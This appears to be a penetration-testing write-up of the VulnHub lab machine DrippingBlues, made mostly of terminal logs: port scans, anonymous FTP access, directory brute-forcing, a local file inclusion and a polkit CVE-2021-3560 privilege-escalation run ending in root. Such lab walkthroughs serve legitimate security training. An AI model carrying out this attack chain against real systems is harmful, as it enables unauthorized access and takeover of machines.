┌──(mikannse㉿kali)-[~/vulnhub/DrippingBlues] └─$ sudo nmap --min-rate=10000 -p- 192.168.56.139 Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-03 13:47 CST Nmap scan report for 192.168.56.139 Host is up (0.00011s latency). Not shown: 65532 closed tcp ports (reset) PORT STATE SERVICE 21/tcp open ftp 22/tcp open ssh 80/tcp open http MAC Address: 08:00:27:13:FC:AA (Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 15.80 seconds
┌──(mikannse㉿kali)-[~/vulnhub/DrippingBlues] └─$ sudo nmap -sT -sC -sV -O -p21,22,80 192.168.56.139 Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-03 13:48 CST Nmap scan report for 192.168.56.139 Host is up (0.00043s latency).
PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 3.0.3 | ftp-anon: Anonymous FTP login allowed (FTP code 230) |_-rwxrwxrwx 1 0 0 471 Sep 19 2021 respectmydrip.zip [NSE: writeable] | ftp-syst: | STAT: | FTP server status: | Connected to ::ffff:192.168.56.131 | Logged in as ftp | TYPE: ASCII | No session bandwidth limit | Session timeoutin seconds is 300 | Control connection is plain text | Data connections will be plain text | At session startup, client count was 2 | vsFTPd 3.0.3 - secure, fast, stable |_End of status 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 3072 9e:bb:af:6f:7d:a7:9d:65:a1:b1:a1:be:91:cd:04:28 (RSA) | 256 a3:d3:c0:b4:c5:f9:c0:6c:e5:47:64:fe:91:c5:cd:c0 (ECDSA) |_ 256 4c:84:da:5a:ff:04:b9:b5:5c:5a:be:21:b6:0e:45:73 (ED25519) 80/tcp open http Apache httpd 2.4.41 ((Ubuntu)) | http-robots.txt: 2 disallowed entries |_/dripisreal.txt /etc/dripispowerful.html |_http-title: Site doesn't have a title (text/html; charset=UTF-8). |_http-server-header: Apache/2.4.41 (Ubuntu) MAC Address: 08:00:27:13:FC:AA (Oracle VirtualBox virtual NIC) Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Device type: general purpose Running: Linux 4.X|5.X OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 OS details: Linux 4.15 - 5.8 Network Distance: 1 hop Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 21.06 seconds
Getshell
FTP允许匿名登陆,上面一个压缩包,下载
┌──(mikannse㉿kali)-[~/vulnhub/DrippingBlues] └─$ ftp 192.168.56.139 Connected to 192.168.56.139. 220 (vsFTPd 3.0.3) Name (192.168.56.139:mikannse): anonymous 331 Please specify the password. Password: 230 Login successful. Remote system type is UNIX. Using binary mode to transfer files. ftp> binary 200 Switching to Binary mode. ftp> ls 229 Entering Extended Passive Mode (|||54984|) 150 Here comes the directory listing. -rwxrwxrwx 1 0 0 471 Sep 19 2021 respectmydrip.zip 226 Directory send OK. ftp> get respectmydrip.zip local: respectmydrip.zip remote: respectmydrip.zip 229 Entering Extended Passive Mode (|||19939|) 150 Opening BINARY mode data connection for respectmydrip.zip (471 bytes). 100% |********************************************************| 471 50.07 KiB/s 00:00 ETA 226 Transfer complete. 471 bytes received in 00:00 (47.66 KiB/s)
┌──(mikannse㉿kali)-[~/vulnhub/DrippingBlues] └─$ feroxbuster -u http://192.168.56.139/ -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x rar,zip,sql,txt,html,bak,pdf,php --filter-status 404 <SNIP> 404 GET 9l 31w 276c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter 403 GET 9l 28w 279c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter 200 GET 9l 21w 138c http://192.168.56.139/index.php 200 GET 9l 21w 138c http://192.168.56.139/ 200 GET 3l 6w 78c http://192.168.56.139/robots.txt
结合纸条告诉的focus on “drip”,猜测参数是drip,成功文件包含,并且得到一个thugger用户
thugger@drippingblues:/tmp$ python3 pwn.py ************** Exploit: Privilege escalation with polkit - CVE-2021-3560 Exploit code written by Ahmad Almorabea @almorabea Original exploit author: Kevin Backhouse For more details check this out: https://github.blog/2021-06-10-privilege-escalation-polkit-root-on-linux-with-bug/ ************** [+] Starting the Exploit <SNIP> root@drippingblues:/tmp# whoami root
